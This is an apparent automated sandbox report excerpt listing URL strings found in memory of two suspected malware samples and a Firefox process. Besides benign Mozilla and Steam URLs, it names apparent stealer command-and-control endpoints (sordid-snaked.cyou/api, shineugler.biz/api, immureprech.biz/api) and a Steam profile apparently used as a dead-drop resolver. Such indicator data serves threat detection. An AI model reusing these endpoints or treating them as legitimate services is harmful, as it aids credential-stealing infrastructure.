Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000768000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.0000000000768000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2861700918.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz:443/api
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.00000000019AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000020.00000003.3347975849.000001D76F45C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000020.00000003.3100377076.000001D765392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2991994359.000001D765392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3237549177.000001D765392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000020.00000003.3357033075.000001D76C178000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/events/1/cb6f8a2a-a9b6-4c23-8f13-aa292
Source: firefox.exe, 00000020.00000003.3347625963.000001D76F478000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3357985948.000001D76C044000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/metrics/1/948e0bc9-74d7-4408-a28a-2e8f
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000020.00000003.2990687457.000001D76C592000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3203110763.000001D76C593000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3249184967.000001D76C593000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000020.00000003.2971960415.000001D76AEBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3030121788.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3053530552.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3017814440.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2999525313.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3277426988.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3007306068.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3131674080.000001D76AEA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000020.00000003.3351738251.000001D76C3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: firefox.exe, 00000020.00000003.3323492995.000001D76C4BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3331519614.000001D76C464000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3320833254.000001D76C4BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lookerstudio.google.com/embed/reporting/
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: firefox.exe, 00000020.00000003.2838933643.000001D761633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000020.00000003.2838933643.000001D761633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000020.00000003.2838933643.000001D761633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: firefox.exe, 00000020.00000003.2838933643.000001D761633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: firefox.exe, 00000020.00000003.2838933643.000001D761633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: firefox.exe, 00000020.00000003.3083499649.000001D76AFC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 00000020.00000003.3228357542.000001D76AFF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3082473747.000001D76AFF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000020.00000003.3083499649.000001D76AFC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000020.00000003.3083499649.000001D76AFC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000020.00000003.2835893600.000001D762900000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000020.00000003.3357985948.000001D76C0B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-
Source: H9TU4oY.exe, 00000007.00000002.2626449977.0000000001652000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2542498583.0000000001652000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.0000000001652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shineugler.biz/
Source: H9TU4oY.exe, 00000007.00000002.2626174676.000000000160E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shineugler.biz/api
Source: H9TU4oY.exe, 00000007.00000002.2626174676.000000000160E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://shineugler.biz/apise
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: H9TU4oY.exe, 00000007.00000002.2626586599.0000000001674000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/api
Source: c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/api/
Source: c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/apiD
Source: H9TU4oY.exe, 00000007.00000003.2592162489.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626586599.0000000001674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/apiU
Source: c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/apia
Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000768000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou:443/api
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000020.00000003.3091128668.000001D7665DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.3100377076.000001D7653D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2991994359.000001D7653D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777301316.000000000163F000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776523029.000000000163A000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/W
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: H9TU4oY.exe, 00000007.00000002.2626548751.000000000166C000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2592162489.000000000166B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.0000000001669000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/f
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626791918.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/p
Source: c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: H9TU4oY.exe, 00000007.00000003.2591548096.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591889728.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626733476.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591548096.000000000164B000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908148719.0000000000762000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: H9TU4oY.exe, 00000007.00000003.2592162489.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626586599.0000000001674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/t
Source: c1ca3b12e5.exe, 0000000F.00000003.2908148719.000000000078B000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000002.2932914771.000000000078B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611997243319003z
Source: c1ca3b12e5.exe, 0000000D.00000003.2776183502.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000002.2789383376.00000000015F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900c
Source: H9TU4oY.exe, 00000007.00000003.2592162489.0000000001673000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000002.2626586599.0000000001674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900h
Source: H9TU4oY.exe, 00000007.00000003.2593421861.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, H9TU4oY.exe, 00000007.00000003.2591490054.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2777392363.0000000001648000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000D.00000003.2776047903.0000000001643000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2908655687.00000000007EF000.00000004.00000020.00020000.00000000.sdmp, c1ca3b12e5.exe, 0000000F.00000003.2907731952.00000000007EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
